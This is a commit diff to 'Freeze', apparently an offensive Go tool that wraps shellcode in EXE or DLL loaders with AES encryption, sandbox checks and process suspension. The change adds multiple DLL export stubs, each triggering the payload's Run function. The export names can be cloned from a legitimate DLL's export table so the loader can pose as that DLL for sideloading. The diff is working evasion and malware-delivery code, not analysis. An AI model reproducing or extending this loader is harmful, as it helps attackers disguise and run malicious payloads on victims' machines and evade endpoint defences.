Support for multiple DLL export functions parsed from a DLL file or comma separated

Freeze.go

@@ -39,7 +39,7 @@ func options() *FlagOptions {
 	Does the Endpoint have more than 2 CPUs?
 	Does the Endpoint have more than 4 gigs of RAM?`)
 	encrypt := flag.Bool("encrypt", false, "Encrypts the shellcode using AES 256 encryption")
-	export := flag.String("export", "", "For DLL Loaders Only - Specify a specific Export function for a loader to have.")
+	export := flag.String("export", "", "For DLL Loaders Only - Specify comma separated Export functions for a loader to have or supply a given DLL file for cloning its Export functions.")
 	flag.Parse()
 	return &FlagOptions{outFile: *outFile, inputFile: *inputFile, console: *console, Sha: *Sha, sandbox: *sandbox, process: *process, export: *export, encrypt: *encrypt}
 }
@@ -134,11 +134,27 @@ func main() {
 	} else {
 		mode = ".exe"
 	}
+	// Default DLL exports
+	var exports = []string{"DllRegisterServer", "DllGetClassObject", "DllUnregisterServer"}
 	if opt.export != "" {
-		fmt.Println("[!] Added an additional Export function called: " + opt.export)
+		if strings.HasSuffix(opt.export, ".dll") {
+			var err error
+			exports, err = Utils.ExportsFromFile(opt.export)
+			if err != nil {
+				log.Fatal("Error: Could not get Export table from given DLL file")
+			}
+			fmt.Println("[!] Added additional Export functions from parsed DLL file: " + opt.export)
+		} else if strings.Contains(opt.export, ",") {
+			exports = strings.Split(strings.ReplaceAll(opt.export, " ", ""), ",")
+			fmt.Println("[!] Added additional Export functions from given list: " + opt.export)
+		} else {
+			exports = []string{opt.export}
+			fmt.Println("[!] Added an additional Export function called: " + opt.export)
+		}
 	}
+
 	fmt.Println("[!] Selected Process to Suspend: " + opt.process)
-	name := Loader.CompileFile(shellcodeencoded, b64ciphertext, b64key, b64iv, opt.outFile, opt.console, mode, opt.export, opt.sandbox, opt.process, opt.encrypt)
+	name := Loader.CompileFile(shellcodeencoded, b64ciphertext, b64key, b64iv, opt.outFile, opt.console, mode, exports, opt.sandbox, opt.process, opt.encrypt)
 	execute(opt, name, mode)
 
 }

Loader/Loader.go

@@ -35,18 +35,21 @@ var (
 	buffer bytes.Buffer
 )
 
-func DLLfunction(export string) string {
+func DLLfunctions(exports []string) string {
 	var buffer bytes.Buffer
 	DLL := &DLL{}
 	DLL.Variables = make(map[string]string)
-	if export != "" {
-		DLL.Variables["ExportFunction"] = `//export ` + export + `
-	func ` + export + `() {
-		Run()
-	}`
-	} else {
-		DLL.Variables["ExportFunction"] = ``
+	var dllStrings string
+	for _, export := range exports {
+		if export != "" {
+			dllStrings = dllStrings + `//export ` + export + `
+            func ` + export + `() {
+                Run()
+            }
+            `
+		}
 	}
+	DLL.Variables["ExportFunction"] = dllStrings
 	buffer.Reset()
 
 	DLLExportTemplate, err := template.New("DLL").Parse(Struct.DLL_Export())
@@ -60,7 +63,7 @@ func DLLfunction(export string) string {
 
 }
 
-func MainFunction(shellcodeencoded string, mode string, console bool, exportable string, sandbox bool, process string, encrypt bool, b64ciphertext string, b64key string, b64iv string) string {
+func MainFunction(shellcodeencoded string, mode string, console bool, exportables string, sandbox bool, process string, encrypt bool, b64ciphertext string, b64key string, b64iv string) string {
 	var buffer bytes.Buffer
 	Main := &Main{}
 	Main.Variables = make(map[string]string)
@@ -224,7 +227,7 @@ func MainFunction(shellcodeencoded string, mode string, console bool, exportable
 	}
 
 	if mode == "dll" {
-		Main.Variables["StartingFunction"] = exportable
+		Main.Variables["StartingFunction"] = exportables
 		Main.Variables["ImportC"] = `import "C"`
 	} else {
 		Main.Variables["StartingFunction"] = `func main(){`
@@ -364,10 +367,10 @@ func MainFunction(shellcodeencoded string, mode string, console bool, exportable
 	return buffer.String()
 }
 
-func CompileFile(shellcodeencoded string, b64ciphertext string, b64key string, b64iv string, outFile string, console bool, mode string, export string, sandbox bool, process string, encrypt bool) string {
+func CompileFile(shellcodeencoded string, b64ciphertext string, b64key string, b64iv string, outFile string, console bool, mode string, exports []string, sandbox bool, process string, encrypt bool) string {
 	var exporttable string
 	if mode == "dll" {
-		exporttable = DLLfunction(export)
+		exporttable = DLLfunctions(exports)
 	} else {
 		exporttable = ""
 	}

Struct/Struct.go

@@ -2,28 +2,12 @@ package Struct
 
 func DLL_Export() string {
 	return `
-	//export DllRegisterServer
-	func DllRegisterServer() {
-		Run()
-	}
-
-	//export DllGetClassObject
-	func DllGetClassObject() {
-		Run()
-	}
-
-	//export DllUnregisterServer
-	func DllUnregisterServer() {
-		Run()
-	}
-
 	{{.Variables.ExportFunction}}
 
 	func main(){
 
 	}
 
-
 	//export Run
 	func Run(){
 

Utils/Utils.go

@@ -7,6 +7,7 @@ import (
 	"encoding/hex"
 	"errors"
 	"fmt"
+	"github.com/Binject/debug/pe"
 	"io"
 	"log"
 	crand "math/rand"
@@ -154,3 +155,20 @@ func CapLetter() string {
 	}
 	return string(b)
 }
+
+func ExportsFromFile(file string) (exports []string, err error) {
+	dllFile, err := pe.Open(file)
+	if err != nil {
+		return
+	}
+	exps, err := dllFile.Exports()
+	if err != nil {
+		return
+	}
+	for _, export := range exps {
+		if "Run" != export.Name {
+			exports = append(exports, export.Name)
+		}
+	}
+	return
+}

go.mod

@@ -1,3 +1,5 @@
 module Freeze
 
 go 1.19
+require golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25 // indirect
+require github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee

go.sum

@@ -0,0 +1,4 @@
+golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25 h1:nwzwVf0l2Y/lkov/+IYgMMbFyI+QypZDds9RxlSmsFQ=
+golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak=
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=